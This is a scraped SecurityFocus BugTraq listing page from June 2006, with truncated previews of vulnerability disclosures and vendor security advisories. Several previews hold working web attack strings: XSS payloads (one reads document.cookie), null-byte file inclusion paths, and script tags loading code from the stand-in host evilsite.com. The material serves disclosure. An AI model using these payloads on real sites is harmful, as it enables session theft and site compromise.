BugTraq
Multiple SQL injection and XSS in integramod portal 2006-06-06
ahwaz setiran com
http://target/index.php?STYLE_URL=%2527

http://index.php?STYLE_URL=<script>;alert(soot);</script>

[USN-289-1] tiff vulnerabilities 2006-06-08
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-289-1 June 08, 2006
tiff vulnerabilities
CVE-2006-2193, CVE-2006-2656
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04

IE Opera DoS exploit 2006-06-08
co296 aol com
Guys, the marquee tag DoS exploit also affects IE and Opera. Here is a proof of concept; credits to n00b and all who helped.

This is for Opera and IE.

<html>

<head>

<style>

</style>

<title>Ie voulnrability credit's to n00b and every-one who helped.</title></head>

<body onload="javascript:

Re: Tiny Web Gallery <= 1.4 XSS 2006-06-06
tinywebgallery mdempfle de
Hi,

TinyWebGallery 1.4.2 is not vulnerable to cross-site scripting anymore.

All input parameters are now checked properly.

Solution: Update to TWG 1.4.

/Michael

bug of script injection in shoutcast servers 2006-06-08
mantasjadzevicius vecro lt
Vulnerable Systems:

All shoutcast servers!!

I found an error in shoutcast server.

When I'm connecting to the server, I type a script in the DJ columns (you can type in all columns), for example:

<script>alert("boo");</script>

<script>location.href="google.com";</script>

or else...

So then

Re: phpBannerExchange 2.0 Directory Traversal Vulnerability 2006-06-08
mopeygoff gmail com
This has been fixed according to the website:

http://www.eschew.net/forums/viewtopic.php?t=501

[SECURITY] [DSA 1091-1] New TIFF packages fix arbitrary code execution 2006-06-08
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1091-1 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze
June 8th, 2006

PHP-Nuke <= 7.9 Search XSS Vulnerability 2006-06-08
try_og hotmail com
# PHP-Nuke <= 7.9 Search module XSS Vulnerability

# It could work on later versions if PHP-Nuke does not patch it.

1: Enter: http://[host]/modules.php?name=Search

2: Search for: "><body onload="alert(document.cookie)

// You'll get a javascript alert with your cookie in it.

# Credits: O.G.

Back-end = 0.7.2.1 (jpcache.php) Remote command execution 2006-06-07
Federico Fazzi (federico autistici org)
/ Federico Fazzi, <federico (at) autistici (dot) org>
*/ Back-end = 0.7.2.1 (jpcache.php) Remote command execution
*/ 08/06/2006 1:04

Bug:

jpcache.php: line 40

---
$includedir = $_PSL['classdir'] . "/jpcache";
---

Proof of concept:

Back-end has a default path pre-set in jpcache.php,
and a cracker can execu

NPDS <= 5.10 Local Inclusion, XSS, Full path disclosure 2006-06-08
gmdarkfig gmail com
// Script

Web -------- www.npds.org

versions --- NPDS <= 5.10

Solutions -- None official

Note ------- Vendor has been contacted

// Local Inclusion

http://[...]/header.php?Default_Theme=../apache/logs/error.log%00

http://[...]/modules/cluster-paradise/cluster-E.php?ModPath=../../../../
../apa

Mathcad Area Lock Vulnerability 2006-06-08
bugtraq firewraith co uk
Description of Vulnerability

============================

One of the features of Mathcad (www.mathsoft.com) is allowing the user to define "Areas". Mathsoft say that "You can use areas to protect, lock, or hide information or equations in your worksheets" and that "You can also protect the content

Uninformed Journal Release Announcement: Volume 4 2006-06-08
Uninformed Journal (sflist digitaloffense net)
Uninformed is pleased to announce the release of its fourth volume. The
articles included in this volume are:

- Engineering in Reverse: Improving Automated Analysis of Windows x64 Binaries
Author: skape

- Exploitation Technology: Exploiting the Otherwise Non-exploitable on Windows
Authors: Sk

Internet Explorer vulnerability 2006-06-08
Mr Niega gmail com
/*

*

* Internet Explorer Crash [Proof of concept]

* Bug discovered by MarjinZ & Mr.Niega

* http://www.swerat.com/

*

* Affected Software: Internet explorer

* Severity: Unknown

* Impact: Crash

* Solution Status: Unpatched

*

* E-Mail: Mr.Niega (at) gmail (dot) com & MarjinZ (at) gmail (dot) com

* __ __ _

[SECURITY] [DSA 1092-1] New MySQL 4.1 packages fix SQL injection 2006-06-08
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1092-1 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze
June 8th, 2006

Tikiwiki 1.9.3.2 security release 2006-06-08
marc marclaporte com
This release fixes a recently declared XSS vulnerability. Anyone using tikiwiki 1.9.x should upgrade asap.

http://tikiwiki.org/tiki-read_article.php?articleId=131

cms-bandits 2.5, Remote command execution 2006-06-08
Federico Fazzi (federico autistici org)
-----------------------------------------------------
Advisory id: FSA:006

Author: Federico Fazzi
Date: 08/06/2006, 11:09
Synthesis: cms-bandits 2.5, Remote command execution
Type: high
Product: http://sourceforge.net/projects/cms-bandits
Patch: unavailable
----------------------

rPSA-2006-0098-1 gdm 2006-06-08
Justin M. Forbes (jmforbes rpath com)
rPath Security Advisory: 2006-0098-1
Published: 2006-06-08
Products: rPath Linux 1
Rating: Severe
Exposure Level Classification:
Local System User Deterministic Privilege Escalation
Updated Versions:
gdm=/conary.rpath.com@rpl:devel//1/2.8.0.8-0.1-1

References:
http://www.cve.mitre.org/c

GUESTEX guestbook code execution 2006-06-08
root (root xzziroz net)
Another hole found while mass auditing free cgi scripts. After finding
it and writing code for it I noticed there is already a BID
(http://www.securityfocus.com/archive/1/425970), but no code. So, here
is some code. Maybe this will further provoke the author to get it
fixed.

--K-sPecial
## Creato

Ez Ringtone Manager from scriptez.net - XSS 2006-06-08
luny youfucktard com
Ez Ringtone Manager

Homepage:

http://www.scriptsez.net

Affected files:

player.php

search input box.

XSS Vulnerabilities:

http://example.com/ringtones/player.php?action=preview&id=<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>&cat=LG%20Mobiles

The search box doesn't properly fil

E-Dating System from scriptsez.net - XSS 2006-06-07
luny youfucktard com
E-Dating System

Homepage:

http://www.scriptsez.net/

Affected files:

Input boxes.

cindex.php

Description:

A Professional dating system that uses flatfiles instead of MySQL.

XSS Vulnerabilities PoC:

The input boxes of sending a message, and editing your profile do not properly

MiraksGalerie <= 2.62 Multiple Remote command execution 2006-06-07
Federico Fazzi (federico autistici org)
*/ Federico Fazzi, <federico (at) autistici (dot) org>
*/ MiraksGalerie <= 2.62 Multiple Remote command execution
*/ 07/06/2006 4:58

Bug:

pcltar.lib.php: line 34 - 35

---
if (!isset($g_pcltar_lib_dir))
$g_pcltar_lib_dir = "lib";
[etc..]
---

galimage.lib.php: line: 157 - 158

---
for($i=count($listconfi

[MajorSecurity #10]i.List <= 1.5 - XSS 2006-06-08
admin majorsecurity de
[MajorSecurity #10]i.List <= 1.5 - XSS

----------------------------------------

Software: i.List

Version: <=1.5

Type: XSS

Date: June, 8th 2006

Vendor: Skoom

Page: http://skoom.de

Credits:

-------------------------------

David 'Aesthetico' Vieira-Kurz

http://www.majors

[SECURITY] [DSA 1093-1] New xine-ui packages fix denial of service 2006-06-08
joey infodrom org (Martin Schulze)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1093-1 security (at) debian (dot) org
http://www.debian.org/security/ Martin Schulze
June 8th, 2006

[ GLSA 200606-06 ] AWStats: Remote execution of arbitrary code 2006-06-07
Sune Kloppenborg Jeppesen (jaervosz gentoo org)
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[NOBYTES.COM: #12] ViArt Shop v2.5.5 - XSS Vulnerability 2006-06-07
John Cobb (johnc nobytes com)
ViArt Shop v2.5.5 Free (and possibly Light, Standard, and Enterprise)

Authors Site: http://www.codetosell.com/

+-[Examples:]--------------------------------------------------+

XSS:

/forum.php?forum_id="><script>alert('XSS');</script>&category_id=1

/reviews.php?category_id=0&item_id=4&rnd=114961

Easy Ad-Manager 2006-06-08
luny youfucktard com
Easy Ad-Manager v. (unknown, not listed on homepage)

Homepage:

http://www.scriptsez.net

Affected files:

details.php

XSS Vulnerability with full path disclosure:

http://www.example.com/eam/details.php?do=load&mbid=/<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>

Warning: fopen(sta

Copyright 2010, SecurityFocus